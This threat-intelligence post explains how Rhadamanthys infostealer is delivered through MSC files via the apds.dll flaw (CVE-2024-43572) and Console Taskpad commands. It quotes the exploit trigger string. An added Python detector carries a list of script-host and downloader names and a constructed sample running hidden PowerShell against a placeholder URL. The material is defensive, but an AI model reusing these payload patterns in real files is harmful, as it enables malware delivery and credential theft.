Rhadamanthys Infostealer Being Distributed Through MSC Extension
AhnLab SEcurity intelligence Center (ASEC) has confirmed that Rhadamanthys Infostealer is being distributed as a file with the MSC extension. The MSC extension is an XML-based format that is executed by the Microsoft Management Console (MMC), and it can register and run various tasks, including script code, command execution, and program execution.
There are two types of MSC malware: one exploits the vulnerability in apds.dll (CVE-2024-43572), and the other executes a command defined in a Console Taskpad. The distribution of MSC malware has been on the rise since June 2024, with the type that exploits the apds.dll vulnerability (CVE-2024-43572) being the most prevalent. The recently discovered MSC file belongs to the type that uses Console Taskpad. More details about MSC malware can be found in the previous blog post.
1. Exploiting the Vulnerability of apds.dll (CVE-2024-43572)
This type locates the resource named “redirect.html” inside apds.dll and abuses its functionality. To trigger it from an MSC file, the string “res://apds.dll/redirect.html?target=javascript:eval(external.Document.ScopeNamespace.GetRoot().Name)” is required.

Figure 1. Part of the MSC internal payload exploiting the vulnerability in apds.dll
The “res://” protocol allows access to resources embedded in local files. In this case, it accesses the “redirect.html” resource in apds.dll. This resource performs a regular expression search to find the code after “target=” and then executes that code using “.exec()”. In other words, the code is executed within the vulnerable DLL itself, not by MMC.

Figure 2. Content of the “redirect.html” resource
2. Using Console Taskpad
This method interprets and executes the commands defined between <ConsoleTaskpads> and </ConsoleTaskpads>. Unlike the first method, the commands are executed by MMC itself. Because it relies on features that MMC supports rather than executing code inside a DLL, it is limited to simple commands and launching specific files.

Figure 3. Internal payload of MSC using Console Taskpad
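The two patterns described above (the “res://apds.dll/redirect.html?target=” string of the first type and a command line defined under <ConsoleTaskpads> for the second type) can both be picked up by a static triage of the MSC XML. The following script is an added example, not ASEC's tooling or code from the malware: it parses an MSC file with Python's standard XML parser, flags any text or attribute value carrying the apds.dll redirect string, and flags every Console Taskpad task whose command invokes a script host or downloader or references a remote URL. The element names (MMC_ConsoleFile, StringTable, ConsoleTaskpads, Task, Command, Parameters) follow the MSC XML layout as assumed here, and both embedded documents are constructed samples with a placeholder URL rather than real payloads.

```python
"""Static triage of MSC (Microsoft Management Console) files.

Added example; not ASEC's tooling. Element names follow the MSC XML
layout as assumed here, and the two sample documents are constructed.
"""
import re
import xml.etree.ElementTree as ET

# Technique 1: the apds.dll "redirect.html" abuse always needs this prefix.
APDS_RE = re.compile(r"res://apds\.dll/redirect\.html\?target=", re.IGNORECASE)
# Remote resources referenced from a taskpad command line.
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Script hosts and downloaders that a legitimate console taskpad rarely launches.
SUSPICIOUS_HOSTS = ("powershell", "pwsh", "cmd", "mshta", "wscript", "cscript",
                    "rundll32", "regsvr32", "certutil", "bitsadmin", "curl")


def findings_for_msc(xml_doc) -> list:
    """Return a list of (technique, detail) tuples for one MSC document.

    xml_doc may be str or bytes (bytes lets the XML declaration pick the
    encoding, which is what you want when reading a file from disk).
    """
    findings = []
    root = ET.fromstring(xml_doc)

    # Technique 1: the string usually lives in a StringTable entry, but scan
    # every text node and attribute so placement does not matter.
    for elem in root.iter():
        for value in [elem.text or "", *elem.attrib.values()]:
            if APDS_RE.search(value):
                findings.append(("apds.dll redirect.html abuse (CVE-2024-43572)",
                                 value.strip()[:120]))

    # Technique 2: Task elements under ConsoleTaskpads carrying a Command.
    for taskpads in root.iter("ConsoleTaskpads"):
        for task in taskpads.iter("Task"):
            command = (task.findtext("Command") or "").strip()
            params = (task.findtext("Parameters") or "").strip()
            if not command:
                continue
            # Basename of the executable, normalised for comparison.
            exe = command.replace("\\", "/").rsplit("/", 1)[-1].lower()
            if any(name in exe for name in SUSPICIOUS_HOSTS):
                findings.append(("Console Taskpad script host", f"{exe} {params}".strip()))
            if URL_RE.search(command + " " + params):
                findings.append(("Console Taskpad remote URL", params or command))
    return findings


def scan_file(path: str) -> list:
    """Triage an MSC file on disk; bytes are passed so the declared encoding applies."""
    with open(path, "rb") as fh:
        return findings_for_msc(fh.read())


# Constructed sample combining both techniques; the URL is a placeholder.
SAMPLE_MSC = r"""<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="UserSDI">
  <StringTables>
    <StringTable>
      <Strings>
        <String ID="1">Document.docx</String>
        <String ID="2">res://apds.dll/redirect.html?target=javascript:eval(external.Document.ScopeNamespace.GetRoot().Name)</String>
      </Strings>
    </StringTable>
  </StringTables>
  <ConsoleTaskpads>
    <ConsoleTaskpad ID="{00000000-0000-0000-0000-000000000000}">
      <Tasks>
        <Task Type="CommandLine">
          <String Name="Name" ID="1"/>
          <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
          <Parameters>-NoProfile -WindowStyle Hidden -File https://placeholder.invalid/stage2.ps1</Parameters>
        </Task>
      </Tasks>
    </ConsoleTaskpad>
  </ConsoleTaskpads>
</MMC_ConsoleFile>
"""

# Constructed benign console: a taskpad that merely opens a local text file.
BENIGN_MSC = r"""<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0">
  <ConsoleTaskpads>
    <ConsoleTaskpad>
      <Tasks>
        <Task Type="CommandLine">
          <Command>C:\Windows\System32\notepad.exe</Command>
          <Parameters>C:\Users\Public\readme.txt</Parameters>
        </Task>
      </Tasks>
    </ConsoleTaskpad>
  </ConsoleTaskpads>
</MMC_ConsoleFile>
"""

if __name__ == "__main__":
    for label, doc in (("malicious sample", SAMPLE_MSC), ("benign sample", BENIGN_MSC)):
        print(label)
        for technique, detail in findings_for_msc(doc):
            print(f"  [{technique}] {detail}")
```

Run against a directory of quarantined MSC files with scan_file; any hit on the first technique is decisive on its own, while a taskpad hit should be reviewed together with the file's icon and string table, since legitimate administrative consoles do occasionally launch cmd.exe.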
The MSC file is disguised as an MS Word document. As shown in Figure 4, when the “Open” button is clicked, it downloads a PowerShell script from an external source and executes it. The downloaded PowerShell script contains an EXE file (Rhadamanthys), which is written to the %LocalAppData% (C:\Users\[Username]\AppData\Local) directory under the name “eRSg.mp3” and then executed.

Figure 4. Icon of the malicious MSC file

Figure 5. Downloaded PowerShell script
The distribution of MSC malware has been on the rise since June 2024. While the type that exploits the apds.dll vulnerability (CVE-2024-43572) no longer runs on systems with the vulnerability patch applied, the type that uses Console Taskpad does not depend on a vulnerability and therefore still works on fully patched systems. Thus, users need to be extra cautious when executing MSC files from an unknown source.